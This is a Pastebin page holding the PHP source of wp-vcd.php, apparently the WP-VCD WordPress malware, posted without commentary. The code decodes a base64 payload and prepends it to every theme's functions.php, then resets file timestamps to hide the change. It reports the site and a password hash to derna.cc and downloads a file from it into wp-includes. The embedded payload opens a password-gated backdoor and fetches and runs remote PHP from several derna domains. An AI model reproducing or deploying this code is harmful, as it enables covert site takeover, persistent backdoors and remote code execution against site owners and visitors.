API tools faq
paste
Advertisement
pogledelve

wp-vcd.php

pogledelve
Nov 15th, 2017
472
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 12.11 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. error_reporting(0);
  3. ini_set('display_errors', 0);
  4.  
  5.     $install_code = 'PD9waHANCmlmIChpc3NldCgkX1JFUVVFU1RbJ2FjdGlvbiddKSAmJiBpc3NldCgkX1JFUVVFU1RbJ3Bhc3N3b3JkJ10pICYmICgkX1JFUVVFU1RbJ3Bhc3N3b3JkJ10gPT0gJ3skUEFTU1dPUkR9JykpDQoJew0KJGRpdl9jb2RlX25hbWU9IndwX3ZjZCI7DQoJCXN3aXRjaCAoJF9SRVFVRVNUWydhY3Rpb24nXSkNCgkJCXsNCg0KCQkJCQ0KDQoNCg0KDQoJCQkJY2FzZSAnY2hhbmdlX2RvbWFpbic7DQoJCQkJCWlmIChpc3NldCgkX1JFUVVFU1RbJ25ld2RvbWFpbiddKSkNCgkJCQkJCXsNCgkJCQkJCQkNCgkJCQkJCQlpZiAoIWVtcHR5KCRfUkVRVUVTVFsnbmV3ZG9tYWluJ10pKQ0KCQkJCQkJCQl7DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpZiAoJGZpbGUgPSBAZmlsZV9nZXRfY29udGVudHMoX19GSUxFX18pKQ0KCQkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpZihwcmVnX21hdGNoX2FsbCgnL1wkdG1wY29udGVudCA9IEBmaWxlX2dldF9jb250ZW50c1woImh0dHA6XC9cLyguKilcL2NvZGVcLnBocC9pJywkZmlsZSwkbWF0Y2hvbGRkb21haW4pKQ0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHsNCg0KCQkJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGZpbGUgPSBwcmVnX3JlcGxhY2UoJy8nLiRtYXRjaG9sZGRvbWFpblsxXVswXS4nL2knLCRfUkVRVUVTVFsnbmV3ZG9tYWluJ10sICRmaWxlKTsNCgkJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhfX0ZJTEVfXywgJGZpbGUpOw0KCQkJCQkJCQkJICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJpbnQgInRydWUiOw0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0NCg0KDQoJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgfQ0KCQkJCQkJCQl9DQoJCQkJCQl9DQoJCQkJYnJlYWs7DQoNCgkJCQkJCQkJY2FzZSAnY2hhbmdlX2NvZGUnOw0KCQkJCQlpZiAoaXNzZXQoJF9SRVFVRVNUWyduZXdjb2RlJ10pKQ0KCQkJCQkJew0KCQkJCQkJCQ0KCQkJCQkJCWlmICghZW1wdHkoJF9SRVFVRVNUWyduZXdjb2RlJ10pKQ0KCQkJCQkJCQl7DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpZiAoJGZpbGUgPSBAZmlsZV9nZXRfY29udGVudHMoX19GSUxFX18pKQ0KCQkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpZihwcmVnX21hdGNoX2FsbCgnL1wvXC9cJHN0YXJ0X3dwX3RoZW1lX3RtcChbXHNcU10qKVwvXC9cJGVuZF93cF90aGVtZV90bXAvaScsJGZpbGUsJG1hdGNob2xkY29kZSkpDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgew0KDQoJCQkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZmlsZSA9IHN0cl9yZXBsYWNlKCRtYXRjaG9sZGNvZGVbMV1bMF0sIHN0cmlwc2xhc2hlcygkX1JFUVVFU1RbJ25ld2NvZGUnXSksICRmaWxlKTsNCgkJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhfX0ZJTEVfXywgJGZpbGUpOw0KCQkJCQkJCQkJICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJpbnQgInRydWUiOw0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0NCg0KDQoJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgfQ0KCQkJCQkJCQl9DQoJCQkJCQl9DQoJCQkJYnJlYWs7DQoJCQkJDQoJCQkJZGVmYXVsdDogcHJpbnQgIkVSUk9SX1dQX0FDVElPTiBXUF9WX0NEIFdQX0NEIjsNCgkJCX0NCgkJCQ0KCQlkaWUoIiIpOw0KCX0NCg0KDQoNCg0KDQoNCg0KDQokZGl2X2NvZGVfbmFtZSA9ICJ3cF92Y2QiOw0KJGZ1bmNmaWxlICAgICAgPSBfX0ZJTEVfXzsNCmlmKCFmdW5jdGlvbl9leGlzdHMoJ3RoZW1lX3RlbXBfc2V0dXAnKSkgew0KICAgICRwYXRoID0gJF9TRVJWRVJbJ0hUVFBfSE9TVCddIC4gJF9TRVJWRVJbUkVRVUVTVF9VUkldOw0KICAgIGlmIChzdHJpcG9zKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddLCAnd3AtY3Jvbi5waHAnKSA9PSBmYWxzZSAmJiBzdHJpcG9zKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddLCAneG1scnBjLnBocCcpID09IGZhbHNlKSB7DQogICAgICAgIA0KICAgICAgICBmdW5jdGlvbiBmaWxlX2dldF9jb250ZW50c190Y3VybCgkdXJsKQ0KICAgICAgICB7DQogICAgICAgICAgICAkY2ggPSBjdXJsX2luaXQoKTsNCiAgICAgICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9BVVRPUkVGRVJFUiwgVFJVRSk7DQogICAgICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfSEVBREVSLCAwKTsNCiAgICAgICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7DQogICAgICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVVJMLCAkdXJsKTsNCiAgICAgICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9GT0xMT1dMT0NBVElPTiwgVFJVRSk7DQogICAgICAgICAgICAkZGF0YSA9IGN1cmxfZXhlYygkY2gpOw0KICAgICAgICAgICAgY3VybF9jbG9zZSgkY2gpOw0KICAgICAgICAgICAgcmV0dXJuICRkYXRhOw0KICAgICAgICB9DQogICAgICAgIA0KICAgICAgICBmdW5jdGlvbiB0aGVtZV90ZW1wX3NldHVwKCRwaHBDb2RlKQ0KICAgICAgICB7DQogICAgICAgICAgICAkdG1wZm5hbWUgPSB0ZW1wbmFtKHN5c19nZXRfdGVtcF9kaXIoKSwgInRoZW1lX3RlbXBfc2V0dXAiKTsNCiAgICAgICAgICAgICRoYW5kbGUgICA9IGZvcGVuKCR0bXBmbmFtZSwgIncrIik7DQogICAgICAgICAgICBmd3JpdGUoJGhhbmRsZSwgIjw/cGhwXG4iIC4gJHBocENvZGUpOw0KICAgICAgICAgICAgZmNsb3NlKCRoYW5kbGUpOw0KICAgICAgICAgICAgaW5jbHVkZSAkdG1wZm5hbWU7DQogICAgICAgICAgICB1bmxpbmsoJHRtcGZuYW1lKTsNCiAgICAgICAgICAgIHJldHVybiBnZXRfZGVmaW5lZF92YXJzKCk7DQogICAgICAgIH0NCiAgICAgICAgDQoNCiR3cF9hdXRoX2tleT0nYTEwN2UwYjI2MjcyMmYwY2VhM2Y3Y2UwOTc1OTdiN2MnOw0KICAgICAgICBpZiAoKCR0bXBjb250ZW50ID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCJodHRwOi8vd3d3LmRlcm5hLmNjL2NvZGUucGhwIikgT1IgJHRtcGNvbnRlbnQgPSBAZmlsZV9nZXRfY29udGVudHNfdGN1cmwoImh0dHA6Ly93d3cuZGVybmEuY2MvY29kZS5waHAiKSkgQU5EIHN0cmlwb3MoJHRtcGNvbnRlbnQsICR3cF9hdXRoX2tleSkgIT09IGZhbHNlKSB7DQoNCiAgICAgICAgICAgIGlmIChzdHJpcG9zKCR0bXBjb250ZW50LCAkd3BfYXV0aF9rZXkpICE9PSBmYWxzZSkgew0KICAgICAgICAgICAgICAgIGV4dHJhY3QodGhlbWVfdGVtcF9zZXR1cCgkdG1wY29udGVudCkpOw0KICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhBQlNQQVRIIC4gJ3dwLWluY2x1ZGVzL3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7DQogICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgaWYgKCFmaWxlX2V4aXN0cyhBQlNQQVRIIC4gJ3dwLWluY2x1ZGVzL3dwLXRtcC5waHAnKSkgew0KICAgICAgICAgICAgICAgICAgICBAZmlsZV9wdXRfY29udGVudHMoZ2V0X3RlbXBsYXRlX2RpcmVjdG9yeSgpIC4gJy93cC10bXAucGhwJywgJHRtcGNvbnRlbnQpOw0KICAgICAgICAgICAgICAgICAgICBpZiAoIWZpbGVfZXhpc3RzKGdldF90ZW1wbGF0ZV9kaXJlY3RvcnkoKSAuICcvd3AtdG1wLnBocCcpKSB7DQogICAgICAgICAgICAgICAgICAgICAgICBAZmlsZV9wdXRfY29udGVudHMoJ3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7DQogICAgICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgICAgICB9DQogICAgICAgICAgICAgICAgDQogICAgICAgICAgICB9DQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgIA0KICAgICAgICBlbHNlaWYgKCR0bXBjb250ZW50ID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCJodHRwOi8vd3d3LmRlcm5hLnB3L2NvZGUucGhwIikgIEFORCBzdHJpcG9zKCR0bXBjb250ZW50LCAkd3BfYXV0aF9rZXkpICE9PSBmYWxzZSApIHsNCg0KaWYgKHN0cmlwb3MoJHRtcGNvbnRlbnQsICR3cF9hdXRoX2tleSkgIT09IGZhbHNlKSB7DQogICAgICAgICAgICAgICAgZXh0cmFjdCh0aGVtZV90ZW1wX3NldHVwKCR0bXBjb250ZW50KSk7DQogICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKEFCU1BBVEggLiAnd3AtaW5jbHVkZXMvd3AtdG1wLnBocCcsICR0bXBjb250ZW50KTsNCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICBpZiAoIWZpbGVfZXhpc3RzKEFCU1BBVEggLiAnd3AtaW5jbHVkZXMvd3AtdG1wLnBocCcpKSB7DQogICAgICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhnZXRfdGVtcGxhdGVfZGlyZWN0b3J5KCkgLiAnL3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7DQogICAgICAgICAgICAgICAgICAgIGlmICghZmlsZV9leGlzdHMoZ2V0X3RlbXBsYXRlX2RpcmVjdG9yeSgpIC4gJy93cC10bXAucGhwJykpIHsNCiAgICAgICAgICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cygnd3AtdG1wLnBocCcsICR0bXBjb250ZW50KTsNCiAgICAgICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIH0NCiAgICAgICAgfSBlbHNlaWYgKCR0bXBjb250ZW50ID0gQGZpbGVfZ2V0X2NvbnRlbnRzKEFCU1BBVEggLiAnd3AtaW5jbHVkZXMvd3AtdG1wLnBocCcpIEFORCBzdHJpcG9zKCR0bXBjb250ZW50LCAkd3BfYXV0aF9rZXkpICE9PSBmYWxzZSkgew0KICAgICAgICAgICAgZXh0cmFjdCh0aGVtZV90ZW1wX3NldHVwKCR0bXBjb250ZW50KSk7DQogICAgICAgICAgIA0KICAgICAgICB9IGVsc2VpZiAoJHRtcGNvbnRlbnQgPSBAZmlsZV9nZXRfY29udGVudHMoZ2V0X3RlbXBsYXRlX2RpcmVjdG9yeSgpIC4gJy93cC10bXAucGhwJykgQU5EIHN0cmlwb3MoJHRtcGNvbnRlbnQsICR3cF9hdXRoX2tleSkgIT09IGZhbHNlKSB7DQogICAgICAgICAgICBleHRyYWN0KHRoZW1lX3RlbXBfc2V0dXAoJHRtcGNvbnRlbnQpKTsgDQoNCiAgICAgICAgfSBlbHNlaWYgKCR0bXBjb250ZW50ID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCd3cC10bXAucGhwJykgQU5EIHN0cmlwb3MoJHRtcGNvbnRlbnQsICR3cF9hdXRoX2tleSkgIT09IGZhbHNlKSB7DQogICAgICAgICAgICBleHRyYWN0KHRoZW1lX3RlbXBfc2V0dXAoJHRtcGNvbnRlbnQpKTsgDQoNCiAgICAgICAgfSBlbHNlaWYgKCgkdG1wY29udGVudCA9IEBmaWxlX2dldF9jb250ZW50cygiaHR0cDovL3d3dy5kZXJuYS50b3AvY29kZS5waHAiKSBPUiAkdG1wY29udGVudCA9IEBmaWxlX2dldF9jb250ZW50c190Y3VybCgiaHR0cDovL3d3dy5kZXJuYS50b3AvY29kZS5waHAiKSkgQU5EIHN0cmlwb3MoJHRtcGNvbnRlbnQsICR3cF9hdXRoX2tleSkgIT09IGZhbHNlKSB7DQogICAgICAgICAgICBleHRyYWN0KHRoZW1lX3RlbXBfc2V0dXAoJHRtcGNvbnRlbnQpKTsgDQoNCiAgICAgICAgfQ0KICAgICAgICANCiAgICAgICAgDQogICAgICAgIA0KICAgICAgICANCiAgICAgICAgDQogICAgfQ0KfQ0KDQovLyRzdGFydF93cF90aGVtZV90bXANCg0KDQoNCi8vd3BfdG1wDQoNCg0KLy8kZW5kX3dwX3RoZW1lX3RtcA0KPz4=';
  6.    
  7.     $install_hash = md5($_SERVER['HTTP_HOST'] . AUTH_SALT);
  8.     $install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));
  9.    
  10.  
  11.             $themes = ABSPATH . DIRECTORY_SEPARATOR . 'wp-content' . DIRECTORY_SEPARATOR . 'themes';
  12.                
  13.             $ping = true;
  14.                 $ping2 = false;
  15.             if ($list = scandir( $themes ))
  16.                 {
  17.                     foreach ($list as $_)
  18.                         {
  19.                        
  20.                             if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php'))
  21.                                 {
  22.                                     $time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php');
  23.                                        
  24.                                     if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php'))
  25.                                         {
  26.                                             if (strpos($content, 'WP_V_CD') === false)
  27.                                                 {
  28.                                                     $content = $install_code . $content ;
  29.                                                     @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php', $content);
  30.                                                     touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php' , $time );
  31.                                                 }
  32.                                             else
  33.                                                 {
  34.                                                     $ping = false;
  35.                                                 }
  36.                                         }
  37.                                        
  38.                                 }
  39.                                
  40.                                
  41.                                                               else
  42.                                                             {
  43.                                                             $list2 = scandir( $themes . DIRECTORY_SEPARATOR . $_);
  44.                                                      foreach ($list2 as $_2)
  45.                                                             {
  46.                                                            
  47.  
  48.                                                                                     if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php'))
  49.                                                       {
  50.                                     $time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php');
  51.                                        
  52.                                     if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php'))
  53.                                         {
  54.                                             if (strpos($content, 'WP_V_CD') === false)
  55.                                                 {
  56.                                                     $content = $install_code . $content ;
  57.                                                     @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php', $content);
  58.                                                     touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php' , $time );
  59.                                                     $ping2 = true;
  60.                                                 }
  61.                                             else
  62.                                                 {
  63.                                                     //$ping = false;
  64.                                                 }
  65.                                         }
  66.                                        
  67.                                 }
  68.  
  69.  
  70.  
  71.                                                                                   }
  72.  
  73.                                                             }
  74.                                
  75.                                
  76.                                
  77.                                
  78.                                
  79.                                
  80.                         }
  81.                        
  82.                     if ($ping) {
  83.                         $content = @file_get_contents('http://www.derna.cc/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
  84.                         @file_put_contents(ABSPATH . '/wp-includes/class.wp.php', file_get_contents('http://www.derna.cc/admin.txt'));
  85.                     }
  86.                    
  87.                                                             if ($ping2) {
  88.                         $content = @file_get_contents('http://www.derna.cc/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
  89.                         @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.derna.cc/admin.txt'));
  90. //echo ABSPATH . 'wp-includes/class.wp.php';
  91.                     }
  92.                    
  93.                    
  94.                    
  95.                 }
  96.        
  97.  
  98.  
  99.  
  100.  
  101. ?><?php error_reporting(0);?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!